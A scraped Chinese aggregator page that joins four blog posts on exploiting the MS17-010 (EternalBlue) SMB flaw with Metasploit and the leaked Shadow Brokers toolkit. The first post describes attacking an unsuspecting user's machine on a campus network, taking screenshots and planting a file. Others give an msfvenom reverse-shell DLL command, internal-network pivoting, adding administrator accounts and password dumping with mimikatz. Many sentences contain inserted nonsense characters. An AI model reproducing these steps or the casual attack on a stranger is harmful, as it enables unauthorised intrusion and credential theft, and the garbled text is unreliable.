導航:首頁 > 編程大全 > eternalblue工具下載

eternalblue工具下載

發布時間:2024-08-26 21:01:48

⑴ MSF利用ms17_010實驗

該漏洞具有非常大的危害性,這個漏洞導致攻擊者在目虛巧標系統上可以執行任意代,包括格式化電腦刪除重要的內容。
當然漏洞非常的古老了,防範只需要打個補丁,再不濟關閉445埠。

首先打開終端輸入
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
安裝成功就能指令msfconsole來使用了

MSF功能不止汪首有利用ms17010,所以我們要選擇對應的模塊,其中利用到
auxiliary/scanner/smb/smb_ms17_010掃描工具模塊
exploit/windows/smb/ms17_010_eternalblue利用工具模塊

由於我實現環境是在校園網環境中,所以也就對校園網進行網段的掃描,我進入是我們的校園無線網路,連接不需要獲得認證上網功能就可以實現漏洞攻擊。

首先是查看自己IP

再利用掃描工具來對網段任何的B段進行掃描

掃出結果10.120.65.230IP存在漏洞風險,使用工具進行攻擊差陵鍵

其中rhost為目標主機ip,lhost為自身監聽ip

顯示攻擊成功了,這個時候,已經可以對被攻擊者為所欲為了
打中後可以輸入help來查看能執行的操作

screenshot來進行截圖屏幕
發現在打游戲,偷偷的不要打擾到別人哦,上傳一個txt提示他存在漏洞需要修復打補丁了呢,實驗成功,點到為止哦。

⑵ 永恆之藍復現[ms17-010]

在2017年5月12日,一場全球性的網路攻擊事件爆發,源於對Windows網路共享協議的惡意蠕蟲代碼利用,此攻擊源自NSA黑客工具包中名腔友為「永恆之藍」(Eternalblue)的攻擊程序。短短五小時內,歐洲、中國等多地的高校、企業內網和政府機構專網均受到波及,攻擊者勒索高額贖金以換取文件解密權,對關鍵數據造成了嚴重影響。

在實際應對中,我發現不少主機仍未安裝補丁,且由於某些環境因素(如不啟用防火牆),使得攻擊者容易得逞。這提醒我們在網路安全法的框架下,要時刻保持警惕,確保系統安全。

對於學習和復現這一攻擊,其原理是通過TCP的445和139埠,利用SMBv1和NBT中的遠程代碼執行漏洞。惡意代碼無需用戶干預,只要設備聯網,攻擊者就能植入勒索軟體等惡意程序。

受影響的Windows版本眾多,包括Windows NT、2000到Windows 2012 SP0。在准備游歲階段,我們可以在Windows7靶機(IP: 192.168.112.135)和Kali 2020攻擊機(IP: 192.168.112.129)上使用nmap和metasploit工具進行操作。首先,通過nmap掃描主機的開放埠,確認是否可ping,如遇防火牆問題,需關閉。接著在metasploit中尋找並利用Eternalblue漏洞。

一旦利用成功,metasploit的meterpreter模式下,伍磨槐可以執行多種操作,如文件上傳下載、密碼獲取、用戶信息查詢等。遇到亂碼問題,可通過輸入chcp 65001解決。

對於已受影響的系統,應盡快進行修復,具體版本可根據官方指南進行。同時,增強系統安全意識和補丁管理是防範此類攻擊的關鍵。

⑶ 內網滲透之ms17-010

在內網滲透時,通常掛上代理後。在內網首先會打啵ms17-010。在實戰中,使用msf的ms17-010模塊,數次沒有反彈成功。基於此,到底如何成功利用ms17-010

在msf成功接收session之後,添加路由

然後使用ms17-010相關的模塊進行探測是否存在該漏洞。

嘗試利用

LHOST配置為公網IP

可以看到success。漏洞是可以利用的,但始終沒有session。不知道什麼原因。
參考資料: 利用公網Msf+MS17010跨網段攻擊內網
筆者在本地搭建環境,也是同樣的結果。嘗試更改payload為

bind_tcp攻擊者去連接,容易被防火牆和殺毒發現
可以成功生成session,但並不穩定,且在run的過程中非常容易導致本來的session died

在實際使用msf的ms17_010_eternalblue模塊時,筆者觀察到有幾個弊端。
1.session 很容易died
2.ms17_010_eternalblue模塊利用起來非常耗時
3.無法利用成功
有大佬推薦使用原始的fb.py。但配置起來感覺麻煩一些。
所以。筆者從i春秋上找到一個輕便的方程式漏洞利用工具。
參考資料: 萌新初試MS17-010方程式漏洞
工具使用起來很簡單。只需要msfvenom生成一個x64或x86的dll文件,替換該工具下的x64.dll或x86.dll 。再依次點擊Eternalblue、Doublepulsar 的Attack即可。在Attack的時候,調用x64.dll動態鏈接庫,反彈到公網IP。原理和fb.py一樣。

筆者通過ew代理進內網後,在跳板機上上傳了方程式漏洞利用工具、網安永恆之藍檢測工具。兩者結合,威力巨大。成功利用ms17-010

對於windows server 2008 ,msfvenom生成x64.dll文件

msf配置

將該x64.dll替換到方程式利用工具下面。
只需要更換目標的IP,就可以獲取session。

對於windows server 2003 ,msfvenom生成x86.dll文件

msf配置

進一步利用的一些命令

實際測試發現這種session非常穩定。不會輕易go die

實際測試server 2003的ms17-010時,有時候多次執行後msf就接收不到session,而且ms17-010利用時,脆弱的server 2003非常容易藍屏。
所以筆者選擇一種穩定可靠一些的辦法。
先通過ms17_010_commend模塊執行系統命令添加用戶至管理員。再指定SMBPass和SMBUser來建立windows可訪問命名管道[accessible named pipe]

參考資料 Metasploit 「永恆之藍」兩種模塊的利弊

system的許可權可以直接激活guest用戶添加管理員組。

注意:使用ms17_010_psexec需要指定管理員的用戶名、密碼,否則沒有session

同樣的操作,載入mimikatz,讀取管理員密碼。

⑷ ms17-010:利用「永恆之藍」攻陷一台計算機

我估摸著這兩天大家都應該被一款老舊的勒索病毒刷爆了朋友圈,可能還有些同學不幸中招,那麼是什麼原因導致了這款勒索病毒如此猖狂?

這件事情還得從一個黑客組織說起,這個組織叫做Equation Group(方程式組織),這一黑客團伙與美國國家安全局(NSA)的關系一直十分密切。而且外界也普遍認為,Equation Group是美國國家安全局的一個下屬部門。很多安全研究專家表示,Equation Group這一黑客組織所擁有的技術無論是從復雜程度還是從其先進程度來看,都已經超越了目前絕大多數的黑客團體,而且該黑客組織已經活躍了二十多年了。

然而,這個黑客組織被另一黑客團伙「The Shadow Brokers」(影子經紀人)給入侵了……(就是這么任性)。「The Shadow Brokers」(影子經紀人)自稱他們從Equation Group手裡拿到了很大一部分黑客工具,決定公開叫賣。

本以為能狠賺一筆,但實際上卻沒有人鳥他們,就橡陸圓是這么神奇。於梁塌是The Shadow Brokers決定公開一部分有價值的工具,其中「eternalblue」(永恆之藍)就是其中之一(漏洞編號ms17-010)。那麼永恆之藍這個漏洞利用程序究竟牛X到什麼地步呢?這么說吧,除了windows 10以外,windows系列的系統無一能夠倖免。

於是乎,永恆之藍漏洞利用悉孫程序+wannacry勒索軟體程序造就了迄今為止最巨大的勒索交費活動,影響到近百個國家上千家企業及公共組織。

接下來,滿足小白的好奇心,一起探究The Shadow Brokers公布的永恆之藍漏洞利用程序,如何利用ms17-010攻陷一台64位windows 7。

攻擊機1(192.168.1.101):
裝有metasploit的linux
攻擊機2(192.168.1.137):
可以運行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶機(192.168.1.140):
windows 7 x64(開放139、445埠)

利用The Shadow Brokers工具箱中的永恆之藍利用程序攻陷靶機

修改後的路徑與目錄當前的路徑一致

一路回車,直到輸入項目名稱處,輸入項目名稱

繼續回車

繼續一路回車,直到選擇模式選擇1

繼續一路回車,直至攻擊完成

相關命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回車,直到選擇系統架構,由於我們要攻擊的主機是win 7 x64位,故這里選擇1

選擇2 dll注入

Ps:喜歡的留個贊b( ̄▽ ̄)d ~也可以關注專題:黑客師。

閱讀全文

與eternalblue工具下載相關的資料

熱點內容
cad字體文件如何導出 瀏覽:236
cs16需要cdkey哪個文件里 瀏覽:817
如何讓另一個表格的數據關聯 瀏覽:368
來自app的快捷指令是怎麼有的 瀏覽:844
保留文件的原始文字圖片 瀏覽:385
國外網站的店怎麼看呢 瀏覽:56
ps入門必備文件 瀏覽:348
以前的相親網站怎麼沒有了 瀏覽:15
蘋果6耳機聽歌有滋滋聲 瀏覽:768
怎麼徹底刪除linux文件 瀏覽:379
編程中字體的顏色是什麼意思 瀏覽:534
網站關鍵詞多少個字元 瀏覽:917
匯川am系列用什麼編程 瀏覽:41
筆記本win10我的電腦在哪裡打開攝像頭 瀏覽:827
醫院單位基本工資去哪個app查詢 瀏覽:18
css源碼應該用什麼文件 瀏覽:915
編程ts是什麼意思呢 瀏覽:509
c盤cad佔用空間的文件 瀏覽:89
不銹鋼大小頭模具如何編程 瀏覽:972
什麼格式的配置文件比較主流 瀏覽:984

友情鏈接